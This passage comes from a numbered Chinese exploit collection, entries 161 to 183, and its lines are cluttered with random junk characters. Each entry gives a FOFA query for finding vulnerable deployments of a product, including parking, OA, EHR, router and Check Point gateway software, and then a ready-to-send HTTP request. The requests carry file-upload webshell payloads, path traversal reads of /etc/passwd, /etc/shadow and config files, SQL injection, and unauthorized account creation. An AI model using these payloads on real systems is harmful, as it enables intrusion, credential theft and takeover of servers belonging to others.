* L8 S4 {; _' i9 L* T. p$ `& Z+ Q' U3 O/ Q  u
161. 科拓全智能停车收费系统 Webservice.asmx 任意文件上传0 f+ n2 z/ y8 e1 y: d" N
FOFA:body="/KT_Css/qd_defaul.css"; x  j1 y) s$ K
第一步,上传文件<fileName>字段指定文件名,<fileFlow>字段指定文件内容,内容需要base64加密
; [9 q! {0 b: }$ j2 B$ z- lPOST /Webservice.asmx HTTP/1.1
5 ]( X6 Q1 C* j* a+ bHost: x.x.x.x) t; d  I3 P# E& M* m; E
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/106.0.5249.62 Safari/537.36
' i% L1 E; l" l: o; uConnection: close
. u3 Z# S$ j* W" r1 iContent-Length: 445
  t7 c2 R1 S; M! s: B6 xContent-Type: text/xml( h' h' Z; e7 I; D+ e: w6 n: b# C
Accept-Encoding: gzip
" i% |, ?+ M2 o2 u1 C7 a; I5 k+ b" f2 ?4 h7 {
<?xml version="1.0" encoding="utf-8"?>
9 d/ p* Y/ E9 S! v* S; ~+ ~8 C<soap:Envelope xmlns:xsi="& U1 |, p) p, L1 g
http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema"
! G* L0 ]: e+ F+ ?+ vxmlns:soap="http://schemas.xmlsoap.org/soap/envelope/">5 l. q  j5 o8 ~. ?
<soap:Body>; V) c# v$ d$ @3 K
<UploadResume xmlns="http://tempuri.org/">
6 K; G) G' A( ]" B<ip>1</ip>+ h5 ]3 R( U5 V7 y4 E: W- {3 T2 Y
<fileName>../../../../dizxdell.aspx</fileName>; d, X9 R# d3 \$ Y
<fileFlow>andqbmFnc3phc3d1ZGh0bmhwYXc=</fileFlow>
0 u6 p1 G- F  L. Q+ B& w# f<tag>3</tag>
' n6 C5 c9 e2 x" _  h- B4 U</UploadResume>
2 v6 w" S) Z7 S& h, [# C3 t; X</soap:Body>
, Y9 b2 q4 a, f6 N! C</soap:Envelope>
& {7 ^8 N8 ^& ?* t& s) b4 M( F1 K; C2 u5 O( ]' m  Y+ ]- n
! ?$ e) g$ b0 ^
http://x.x.x.x/dizxdell.aspx! u# x' @0 U/ Y
" k# w+ {" p9 s1 ~; U3 E' l
162. 和丰多媒体信息发布系统 QH.aspx 任意文件上传
: W/ C: T- x. K  o$ l' tFOFA: app="和丰山海-数字标牌"
/ {" x3 W: B5 o& ?1 ?1 A, Y6 [4 zPOST /QH.aspx HTTP/1.1: @$ _! S: @( l2 }& F4 m* Y* I
Host: x.x.x.x
( G9 \, b/ U7 P0 ^  |User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/114.0& T/ H' L; H5 r* M
Connection: close2 h: x3 A( ~- j. {9 ~# ~& z
Content-Length: 583; q9 W! F& ~; F  \- u
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryeegvclmyurlotuey4 @- H+ d! y# D6 F2 {5 }6 f
Accept-Encoding: gzip
1 s1 C6 ]: Q( Q  h0 S! f. d) O
0 m1 M$ F: [4 ~: D% U& ?- {------WebKitFormBoundaryeegvclmyurlotuey
8 r7 B3 s0 C( d# Q! t; WContent-Disposition: form-data; name="fileToUpload"; filename="kjuhitjgk.aspx"5 l! _! q! x! ~+ m) b9 H3 s: {
Content-Type: application/octet-stream- ^9 y8 a( ]" b; ]
( @2 |2 l# t9 P9 X
<% response.write("ujidwqfuuqjalgkvrpqy") %>
" c$ B. h8 `9 q6 U# I+ R------WebKitFormBoundaryeegvclmyurlotuey
0 t: Q! \4 q9 w8 sContent-Disposition: form-data; name="action"% U, ]4 O/ Z% g4 Q

$ o: W$ O- L8 v+ cupload: x4 t0 g) V1 B: F; G' k
------WebKitFormBoundaryeegvclmyurlotuey$ F  V+ D1 J$ y) Q$ X2 G1 w
Content-Disposition: form-data; name="responderId"
" j: Y+ `) b; w& A6 ?7 A/ m7 X. U0 I# w
ResourceNewResponder
0 C. \" _2 _5 `& {/ r1 a) i------WebKitFormBoundaryeegvclmyurlotuey+ Z" E: E* p/ ^4 Q$ V5 q
Content-Disposition: form-data; name="remotePath", z: g0 A% y( F6 e

0 v/ v; y! |$ Z( ?/opt/resources
3 E/ \; U3 U! q- D1 o) w------WebKitFormBoundaryeegvclmyurlotuey--9 o9 d5 K+ j, T% L3 \% S
0 Y- l( O3 W5 D& X5 }+ I! S0 M5 b

0 l9 A/ A, B+ c  f1 }( o$ ]http://x.x.x.x/opt/resources/kjuhitjgk.aspx
0 b. A( u: |/ e0 {+ Z9 Q3 D2 _7 T' E2 b+ b4 b8 \
163. 号卡极团分销管理系统 ue_serve.php 任意文件上传
  s( z! v7 @( x# n6 \; QFOFA: icon_hash="-795291075"
. r, M& P1 A2 z8 FPOST /admin/controller/ue_serve.php?action=image&encode=utf-8 HTTP/1.1
/ E/ b: M! }2 }6 v% kHost: x.x.x.x
' G, K; |4 H5 `9 I1 C. lUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/106.0.5249.62 Safari/537.36& w3 {: @  O, ~( i6 g
Connection: close
$ t, \0 }" ]1 LContent-Length: 293+ |' W. ?# T" L7 z' _$ u3 u/ p9 K
Accept: */*6 ~$ y- a  K- k
Accept-Encoding: gzip, deflate5 O, f8 O' T* Q- ^) i
Accept-Language: zh-CN,zh;q=0.9' Q: u7 t. N/ B5 F% ~
Content-Type: multipart/form-data; boundary=----iiqvnofupvhdyrcoqyuujyetjvqgocod
( V0 G4 m2 h- H" J% [0 Q; [2 v- ^
# U4 B, j2 ]* j% N$ r------iiqvnofupvhdyrcoqyuujyetjvqgocod
' I# ?' W! B  @/ dContent-Disposition: form-data; name="name"6 {5 X% F- t9 C( p" l, ~

" y) D' h6 R( k1.php
' ], c9 L% F4 s: d------iiqvnofupvhdyrcoqyuujyetjvqgocod
8 P1 m* K1 r& R. q- OContent-Disposition: form-data; name="upfile"; filename="1.php"
6 ^6 w. x* b0 d+ t* A# ^Content-Type: image/jpeg
5 x( V$ d$ {; a' t8 [, l0 i$ ~2 M! L" V/ k
rvjhvbhwwuooyiioxega8 M* T9 |) _% ?
------iiqvnofupvhdyrcoqyuujyetjvqgocod--0 [  y/ S) t) f  e

  i  Y+ t) S+ T4 |; q3 s4 K
: K5 y+ z& f' {. h, |# i164. 慧校园(安校易)管理系统 FileUpProductupdate.aspx 任意文件上传
* w: {& V" `: R- gFOFA: title="智慧综合管理平台登入"
: j7 b4 ~- g9 y. E/ g' A  PPOST /Module/FileUpPage/FileUpProductupdate.aspx HTTP/1.19 L5 z) W4 [4 K/ }* Q. K
Host: x.x.x.x, z, n2 `! w0 R
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0
( V2 X; T3 s6 G1 U+ }, rContent-Length: 2885 H* q) ?- g7 |8 R) t
Accept: application/json, text/javascript, */*; q=0.013 W6 H& p4 `' c+ G$ `; F- M
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2,
+ O& a$ q( e0 x$ wConnection: close$ ~% L. q: s# u. _- b0 W, Z
Content-Type: multipart/form-data; boundary=----dqdaieopnozbkapjacdbdthlvtlyl) _% V3 f- N4 q- Q
X-Requested-With: XMLHttpRequest* W  e( O; G! N( |8 w+ W
Accept-Encoding: gzip9 R- ]4 Y8 t& |8 b
& F$ Z5 i* l4 H) L1 o8 ~" s1 ?
------dqdaieopnozbkapjacdbdthlvtlyl# Q2 c- R- a5 T2 f' h2 b! ?$ c! i' V
Content-Disposition: form-data; name="Filedata"; filename="qaz.aspx"
+ }5 N& D( x8 U$ T+ R( U5 GContent-Type: image/jpeg* }' M+ |- a9 _" d5 K4 X: Q

5 v7 u, S; v+ `: F/ S4 H5 q" h. F/ ?<%@Page Language="C#"%><%Response.Write("aitwpovoxwtgixpfqiys");System.IO.File.Delete(Request.PhysicalPath);%>
& J$ f% {, C2 ~) Y: d------dqdaieopnozbkapjacdbdthlvtlyl--
, [* N! h4 f" m( ?$ l, }) C3 A# F+ V+ m/ r
; u% v/ N& C: J9 k' i  p
http://x.x.x.x/Upload/Publish/000000/0_0_0_0/update.aspx6 m" Z3 D4 ?, t5 _$ J( g
+ P" i0 K* @: Y- r8 o+ U
165. OrangeHRM 3.3.3 SQL 注入+ |- q* o/ h2 W4 G9 L- W
CVE-2024-364285 y! ^  E1 E4 q% A
FOFA: app="OrangeHRM-产品"
' o1 W' ~- R) B, o3 n3 }6 rURL:https://192.168.1.28/symfony/web ... e&sortOrder=ASC,(SELECT (CASE WHEN (5240=5240) THEN 1 ELSE 5240*(SELECT 5240 FROM INFORMATION_SCHEMA.PLUGINS) END))
7 m) o9 O% X# W" @3 ]3 H1 a' ~  `1 g; X% h# R! a
, A) E, M% l0 O$ \) y, S+ j
166. 中成科信票务管理平台SeatMapHandler SQL注入0 V0 t7 E( B( D  E5 S8 ^
FOFA:body="技术支持:北京中成科信科技发展有限公司"
- L: W" h) N' v- ?, {5 XPOST /SystemManager/Comm/SeatMapHandler.ashx HTTP/1.1
+ K5 X0 X2 Z4 v3 i  {2 zHost:
& W1 l7 Z4 r) V+ N  V7 S7 PPragma: no-cache
6 x$ g& }; S( i6 }9 {* ~Cache-Control: no-cache! t. b+ y- @! i! ?8 j1 p' Q
Upgrade-Insecure-Requests: 13 A9 U. ]/ [$ x$ _' H7 ]1 {  \/ Y
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36
+ }2 ]6 N* ~4 A4 r6 _8 W; BAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7' E1 j. S+ w/ W4 y& F- Y
Accept-Encoding: gzip, deflate
: @9 e; l: G1 X0 RAccept-Language: zh-CN,zh;q=0.9,en;q=0.8, Z1 e; [' b; R
Cookie: ASPSESSIONIDCCRBRCTD=LHLBDIBAKDEGBCJGKIKMNODE# s$ B* h% z* G) s( M6 h
Connection: close0 A1 f) z" f. f* i& O* l0 r
Content-Type: application/x-www-form-urlencoded
' \: i8 f, u$ R3 W3 u# S  bContent-Length: 895 Y+ x% F- ^8 B8 r9 m
  o  A# z1 f6 V( A
Method=GetZoneInfo&solutionNo=%27+AND+4172+IN+%28SELECT+%28CHAR%28104%29%2BCHAR%28101%29%2BCHAR%28108%29%2BCHAR%28108%29%2BCHAR%28111%29%29%29--+bErE
0 Z9 o" c1 u# P5 \
# B- w& t1 b7 y
+ @( X6 g, [. U5 s) B$ c167. 精益价值管理系统 DownLoad.aspx任意文件读取
) j: F  h3 e; g& F- Y- gFOFA:body="/ajax/LVS.Core.Common.STSResult,LVS.Core.Common.ashx"% C1 I' v/ X$ e* C1 X8 T. J
GET /Business/DownLoad.aspx?p=UploadFile/../Web.Config HTTP/1.1
; T- ~; J8 n; C* jHost:
" c# p% @( m8 \' I# ]7 }) ^* oUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
3 B! d5 m% U8 {  U/ A9 [# |Content-Type: application/x-www-form-urlencoded
! _+ [4 I* p+ x& DAccept-Encoding: gzip, deflate. d4 a- W9 |8 i( Q
Accept: */*
" I! G! ?- U& W% _% K4 vConnection: keep-alive( l. {( S3 {5 y; w  U/ Y/ o9 ^

, {/ |! s( v/ h3 o. p% J" q0 m! u- u# L. ~5 S9 W
168. 宏景EHR OutputCode 任意文件读取
, X, }$ s  @! N/ c; f2 |FOFA:app="HJSOFT-HCM"# e8 R3 J* u7 J( Y9 `
GET /servlet/OutputCode?path=VHmj0PAATTP2HJBPAATTPcyRcHb6hPAATTP2HJFPAATTP59XObqwUZaPAATTP2HJBPAATTP6EvXjT HTTP/1.1/ l! J0 I! Y* r# `5 p: F0 u( @. j9 W
Host: your-ip& ]4 j& p5 F( G  O9 P
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.90 Safari/537.36; I6 @  j; _- @: |& F8 R3 N8 S  b% i
Content-Type: application/x-www-form-urlencoded+ K3 M% f& t. u& S
Connection: close
( `+ G2 f9 l, h, ^/ U$ k8 ?) M7 B) Y" B5 b: G
, q! x8 ]6 I: P! j* j8 g  R; i
% |, u( t& S4 t5 d  I' V' K
169. 宏景EHR downlawbase SQL注入# i" d; B" p2 m( j7 @
FOFA:app="HJSOFT-HCM"7 _5 U; E( a9 }/ o! x
GET /templates/attestation/../../selfservice/lawbase/downlawbase?id=1';WAITFOR+DELAY+'0:0:5'--+ HTTP/1.16 t2 _$ ~! m6 A1 r/ g" h" n
Host: your-ip% r$ q! W- _: K( l% W) a8 X
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.363 {4 h8 x! {! |8 _
Accept: */*4 w0 q, ^" n+ L# U
Accept-Encoding: gzip, deflate+ V+ m  ?/ _2 c: E& d
Connection: close: R& f) N. Y% ^: v( t) m7 B' f: f# q
7 V% P2 h  ]: v( E& ]& n9 V
- B9 M& D% o% J! g5 @
/ e+ {% f9 s: Y5 |
170. 宏景EHR DisplayExcelCustomReport 任意文件读取
9 n, ^+ ^4 z2 H9 H) O4 o( TFOFA:body="/general/sys/hjaxmanage.js"6 ?# l: F. e, _6 F. m5 J( A
POST /templates/attestation/../../servlet/DisplayExcelCustomReport HTTP/1.18 W! Y! [8 @; c& l/ z
Host: balalanengliang
  z$ k# \# K7 u7 ^( c- X5 `User-Agent:Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36$ X' I8 ^5 k: M7 W; Y
Content-Type: application/x-www-form-urlencoded8 B. g' L; ?" m6 Z3 f0 e) _' U' H! [9 j/ P
, g6 E4 U+ z% u  B
filename=../webapps/ROOT/WEB-INF/web.xml/ H4 e) H+ f4 Y! U6 N6 b6 P# ]

3 m# \) Y) P; z  _& U/ p
* [3 r3 c' b2 X  N9 H2 f! w# q* q171. 通天星CMSV6车载定位监控平台 SQL注入. v" G! T, m- ~; V2 \, j
FOFA:body="/808gps/"( F# v9 Z% i5 i9 L  P8 Q
GET /run_stop/delete.do;downloadLogger.action?ids=1)+AND+(SELECT+5394+FROM+(SELECT(SLEEP(5)))tdpw)--+&loadAll=1 HTTP/1.1
0 f* s; E+ i7 hHost: your-ip
0 `: u  X' z- Y5 z- b, dUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:109.0) Gecko/20100101 Firefox/110.0
# T' _% T. R# sAccept: */*; _5 G/ N6 z  `- ?0 }
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
# N$ V: v# }( kAccept-Encoding: gzip, deflate
( P2 m- Z! T% [3 j; O+ LConnection: close8 ~7 z7 R& j, h, k. R7 P3 `( \. E" Q5 s

. F9 \4 U% V" H; w3 U1 o- E
8 ~7 L9 _% Z3 d8 |
+ H% O* H7 H) n172. DT-高清车牌识别摄像机任意文件读取0 A0 b8 M# t; H/ z# w2 e9 V% n
FOFA:app="DT-高清车牌识别摄像机"
+ O; J( A; K5 j5 x# g. KGET /../../../../etc/passwd HTTP/1.1
/ O6 F  z* n, S' ?Host: your-ip
  g1 ?% ~3 S0 m1 t+ V* FUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36/ ^: {" x/ {8 b. x  G6 W& Y2 ~
Accept-Encoding: gzip, deflate
- B. {) A3 U+ F6 T6 A9 e( R% k% [Accept: */*
+ s1 d  C6 D. ~. y  p4 r# v# uConnection: keep-alive
, \5 s5 \6 Y$ ]5 {. m' V( Z
2 z9 Q9 C3 j5 I* r* M! z7 |9 _8 H% f

9 u0 e; M- l7 r2 c173. Check Point 安全网关任意文件读取
6 _9 a# b2 u3 [CVE-2024-24919- d$ \2 p* O" s% u) \6 b- ^
FOFA:app="Check_Point-SSL-Network-Extender"9 {6 ^; y5 t$ x; h9 A
POST /clients/MyCRL HTTP/1.1" l/ D, i: C, T; B' Q
Host: your-ip6 F, O( H9 F2 n9 N! {/ W
Content-Type: application/x-www-form-urlencoded
% r* z9 H9 M0 g+ i6 Q
# l- S- e. e; A) J9 JaCSHELL/../../../../../../../etc/shadow
# d" I2 j6 c# r4 A0 v
  l7 N" N& o3 _) l; [1 X0 S( q! d
3 D' P# c9 t4 m2 }5 o* `' D
174. 金和OA C6 FileDownLoad.aspx 任意文件读取
4 h5 n4 |  {+ P3 E( DFOFA:app="金和网络-金和OA"8 n# c% \) \2 g  F2 x1 ]. [% Q
GET /c6/JHSoft.Web.CustomQuery/FileDownLoad.aspx?FilePath=../Resource/JHFileConfig.ini HTTP/1.1' {: ?0 l. D( [" {+ O
Host: your-ip
  P: t( g, A6 }/ U' s* e% ~3 l) o0 CUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36& _2 P; J; B* g9 B9 h! _
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.79 p/ k* c; o3 k6 x9 `. `+ W% z
Accept-Encoding: gzip, deflate, br& w  I# g4 S) S1 g$ H" v
Accept-Language: zh-CN,zh;q=0.9
; f( f8 A/ J# M7 q8 r( s. nConnection: close
7 g5 Y* H1 I2 m- k. k+ \  j, v% E, G% x$ E
& T& L  B$ @% m& N/ p' ^

+ J  i; h& c0 t' n+ s0 i175. 金和OA C6 IncentivePlanFulfill.aspx SQL注入
0 A( s8 W5 Y: `; S* b6 T% R6 `, WFOFA:app="金和网络-金和OA"
# D" X2 J# C! r* h# YGET /C6/JHSoft.Web.IncentivePlan/IncentivePlanFulfill.aspx/?IncentiveID=1%20WAITFOR%20DELAY%20'0:0:5'--&TVersion=1 HTTP/1.1
! M  H( b1 k8 A$ eHost:0 x; n! v, s& l5 \! z1 m' h
User-Agent: User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.366 ?5 L$ T" y# j, r* K0 \/ t
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8! {0 ~: G; n' E1 }* P
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2" o- X5 G9 i5 f* S& Q5 k
Accept-Encoding: gzip, deflate$ N  G3 d# G! e
Connection: close
6 U( \# ]# V. Q& v* ZUpgrade-Insecure-Requests: 1! R6 o+ _0 a5 _) J
, {2 d) _7 F& h: a
6 ]9 _6 N2 x3 n1 L0 ?
176. 电信网关配置管理系统 rewrite.php 文件上传( j+ J4 y0 X- n
FOFA:body="img/login_bg3.png" && body="系统登录"
8 \4 P* i' [, O! G) D' U% SPOST /manager/teletext/material/rewrite.php HTTP/1.1
4 l0 t+ R8 M8 t. {$ x  {Host: your-ip- q1 H' E' w% ?6 q9 I! L1 T
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:125.0) Gecko/20100101 Firefox/125.0
7 a3 w) ^- C% Y$ ^: fContent-Type: multipart/form-data; boundary=----WebKitFormBoundaryOKldnDPT# [1 P$ ^9 j- k" e
Connection: close
1 g* h- k0 Q8 `) y3 ?
5 H2 d' M( G/ y) B4 a4 m3 e------WebKitFormBoundaryOKldnDPT
  i: }! i$ X! R0 MContent-Disposition: form-data; name="tmp_name"; filename="test.php"
# r" \% }: A4 N. k( uContent-Type: image/png% ^5 P7 c+ T9 l  E/ k, v

+ U7 t1 |; [4 d( I* K9 K<?php system("cat /etc/passwd");unlink(__FILE__);?>) ]& s! W' _7 h0 V% U1 X
------WebKitFormBoundaryOKldnDPT
3 j, Y0 k7 G9 t1 G$ `, DContent-Disposition: form-data; name="uploadtime"
0 P: s% a& P0 k, ?( M" p9 j 4 y; H& g$ ^% M2 n
6 k3 Q! k' N3 U4 d: w3 [
------WebKitFormBoundaryOKldnDPT--0 g( B# |( @6 \; F
# t' Q5 }0 @2 L( O4 A  N3 s( c
: `! b8 W) G% e, C" J% D) v
! k: Q5 O+ g. v& T* J
177. H3C路由器敏感信息泄露
9 S' U3 O' Q* t; {/userLogin.asp/../actionpolicy_status/../ER8300G2.cfg, r7 \7 Y5 }- Y2 ^
/userLogin.asp/../actionpolicy_status/../M60.cfg
& l, V( X; s5 @% ?6 g+ ?$ Z/userLogin.asp/../actionpolicy_status/../GR8300.cfg
* e/ r6 S2 |  d! \) N/userLogin.asp/../actionpolicy_status/../GR5200.cfg6 A5 @# O# i$ a' ]/ ?
/userLogin.asp/../actionpolicy_status/../GR3200.cfg
2 F- y9 Y0 q6 U/ Q. N3 w4 T/userLogin.asp/../actionpolicy_status/../GR2200.cfg
$ _# K2 z* M. V- S% q* c/userLogin.asp/../actionpolicy_status/../ER8300G2-X.cfg7 D# g& l6 e$ u$ [3 V
/userLogin.asp/../actionpolicy_status/../ER8300G2.cfg$ j# P: _3 J& B; d1 ~& g
/userLogin.asp/../actionpolicy_status/../ER6300G2.cfg
8 G* h# N# {2 L7 j7 K/userLogin.asp/../actionpolicy_status/../ER5200G2.cfg
: V9 N& g  N9 u: C6 k/ a/userLogin.asp/../actionpolicy_status/../ER5200.cfg$ n& G& x0 b) F. ]4 \
/userLogin.asp/../actionpolicy_status/../ER5100.cfg) T' g$ m, Y% e7 x& _+ I
/userLogin.asp/../actionpolicy_status/../ER3260G2.cfg2 C' u, q  s9 c# e
/userLogin.asp/../actionpolicy_status/../ER3260.cfg
# s) E9 k& l" h% a1 {6 l/userLogin.asp/../actionpolicy_status/../ER3200G2.cfg+ |+ p+ o$ y) s3 {) u2 k. S
/userLogin.asp/../actionpolicy_status/../ER3200.cfg! [3 [' p7 v& c/ z, \" \
/userLogin.asp/../actionpolicy_status/../ER3108GW.cfg
# ^9 \* _7 r6 n$ _/userLogin.asp/../actionpolicy_status/../ER3108G.cfg
& [* _9 s" E! S/userLogin.asp/../actionpolicy_status/../ER3100G2.cfg1 {( H, N' p' |, F2 B
/userLogin.asp/../actionpolicy_status/../ER3100.cfg7 z: j+ Z- n0 v
/userLogin.asp/../actionpolicy_status/../ER2200G2.cfg! b/ Z, M3 G9 ~( l8 U7 H% m; C

2 r) i2 m% [: M1 U9 y# ]8 |: l
, t1 w+ O; m; S178. H3C校园网自助服务系统-flexfileupload-任意文件上传& x' i# y- Q. b
FOFA:header="/selfservice"
0 f) @$ s: r$ E, CPOST /imc/primepush/%2e%2e/flexFileUpload HTTP/1.1
/ }( }; ?! J, t0 D) G( {. kHost:0 H% P" a2 d. s5 A( k/ X
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36. {, \9 ?, G4 n! L6 ^. u6 z. D
Content-Length: 252
1 t7 o, T+ r. v5 KAccept-Encoding: gzip, deflate
, ^: o- x+ h2 [0 kConnection: close" a% s- q  a1 w# E" U
Content-Type: multipart/form-data; boundary=---------------aqutkea7vvanpqy3rh2l% y, B2 f1 u- a- \% b# S
-----------------aqutkea7vvanpqy3rh2l
* F8 I5 Q; [( qContent-Disposition: form-data; name="12234.txt"; filename="12234"% ^: @1 g( o) \; U4 g* \, C8 o+ P
Content-Type: application/octet-stream
8 W7 \8 Z  _, U  t* ?  m2 @/ y9 C! NContent-Length: 2555 Z7 ^* w! K" M' X

5 v, ~$ H4 ~' J, u12234
+ B  ]1 X" [4 z* ^-----------------aqutkea7vvanpqy3rh2l--$ [' J" R! V% N' T

! l) u4 y' D' x, X: j( ]* G$ D, i4 o, `8 g3 o4 t" g2 H
GET /imc/primepush/%2e%2e/flex/12234.txt  `) q( k. F: t9 r& N* f

2 W0 l, k  _/ K; i3 o
; p- L$ B; c$ d! d% w179. 建文工程管理系统存在任意文件读取0 d& T. K$ Z2 d3 w! w- p, m' l
POST /Common/DownLoad2.aspx HTTP/1.1. @, n& r, F; e* j
Host: {{Hostname}}. P3 B8 _' I5 ?' Z8 N
Content-Type: application/x-www-form-urlencoded' P9 {/ h% m. _
User-Agent: Mozilla/5.0
: v# U% f  C# h! r% n9 t
1 |6 T  E6 B4 \path=../log4net.config&Name=$ g- O2 D! W/ B( _( m, K; S
4 y+ a) m3 B/ I9 k
: r* q) j2 c2 A2 `' c
180. 帮管客 CRM jiliyu SQL注入8 L6 x9 i) b7 M; r. W0 Y
FOFA:app="帮管客-CRM"$ n3 K5 o, a( k2 _
GET /index.php/jiliyu?keyword=1&page=1&pai=id&sou=soufast&timedsc=激励语列表&xu=and%201=(updatexml(1,concat(0x7e,(select%20user()),0x7e),1)) HTTP/1.1
3 P8 e- ]/ g) k6 [Host: your-ip
/ H( ]' L& `; d' w! U- K( l0 SUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36
( h" A0 ~1 K0 N( {4 z3 sAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7- |, \0 e: m, n) l4 X# ?
Accept-Encoding: gzip, deflate: V% p' Y# g2 Y! E( I
Accept-Language: zh-CN,zh;q=0.96 E9 \7 o) ~+ K4 x1 J) \
Connection: close
7 L" N' D; j# `5 C% u" m+ U3 x. Q
: ^, r' n1 S  v* k. |9 d6 N
9 `1 k3 g! P# T181. 润申信息科技企业标准化管理系统 UpdataLogHandler.ashx SQL注入
- h+ l+ h" s: g2 b/ g. T/ yFOFA:"PDCA/js/_publicCom.js"
6 `- T( ~+ J  u6 ?$ t3 e7 H' SPOST /PDCA/ashx/UpdataLogHandler.ashx HTTP/1.14 d4 B. D0 b; y2 ^
Host: your-ip! ~3 p+ K% h) Q$ {# C& |% i
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36" Y! `% |4 z& J
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
! x% z: W  s: d: Q! E0 \Accept-Encoding: gzip, deflate, br0 B, m  z- t& _
Accept-Language: zh-CN,zh;q=0.9" q, K5 B& y8 e
Connection: close
9 Z+ b1 w' e6 R- \, T2 F8 gContent-Type: application/x-www-form-urlencoded! |; O6 O$ D) G# R8 o, ^# ]! N" Y9 V

; e# |& G+ A' B8 \- S6 u- P( C2 X5 V0 a8 J2 Q
action=GetAll&start=' WAITFOR DELAY '0:0:5'--&end=&code=11&type=2&page=1&rows=20+ M& C( h9 A7 t) c: l) z

0 f  H) I/ o: @! \0 G) T  G2 I; {# R- E) |" x( q2 u# T1 i
182. 润申科技企业标准化管理系统AddNewsHandler.ashx 任意用户创建
0 X2 ]- t+ V: Z) S+ y* T5 CFOFA:"PDCA/js/_publicCom.js"
5 {) c* g; Q1 K$ ?" ?5 M! HPOST /PDCA/ashx/AddNewsHandler.ashx?action=Adduser HTTP/1.1  @3 m; M5 ?' J% Z& i5 @
Host: your-ip
7 j) M, Z* z8 X6 I" NUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36
- J+ s0 _* D1 WAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
" `& T! n7 b! b+ q( [/ d5 TAccept-Encoding: gzip, deflate, br
. M1 l% w: s; vAccept-Language: zh-CN,zh;q=0.9
8 W% Z. W2 X( _( B" `Connection: close1 [' X( r3 I* y/ z
Content-Type: application/x-www-form-urlencoded- t" x: D) J1 h1 T1 }3 ~

3 d# f9 |( k# y3 w# b
0 l, u. j+ O6 H: W+ W9 iusername=test1234&pwd=test1234&savedays=1
# b7 f% j8 d5 @* h- C. R9 r) }
8 M, `( s1 T# V  u; C5 H# Z$ [& C8 x* ~8 @& D2 P( C7 o4 y
183. 广州图创图书馆集群管理系统 updOpuserPw SQL注入
1 W) @' C1 z1 HFOFA:body="interlib/common/" || body="Interlib图书馆集群管理系统" || body="/interlib3/system_index" || body="打开Interlib主界面"
# Q4 ]# T* g# KGET /interlib3/service/sysop/updOpuserPw?loginid=admin11&newpassword=Aa@123456&token=1%27and+ctxsys.drithsx.sn(1,(select%20111111*111111%20from%20dual))=%272 HTTP/1.1- P8 @0 u$ U! R. G; n
Host: your-ip
3 M" F# U- A- w+ MUser-Agent: Mozilla/5.0 (Linux; Android 11; motorola edge 20 fusion) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.61 Mobile Safari/537.36# j! w) |( u9 S, F% W2 T: ^! l  y
Accept-Charset: utf-8
3 \$ S3 i$ K- K9 `3 O: S& h9 t; m& PAccept-Encoding: gzip, deflate
! {, p' g$ J" h8 L( o9 E  t' eConnection: close
* d8 p8 S( Y# D( W% U$ v9 U, u6 [" Z! n+ y2 t

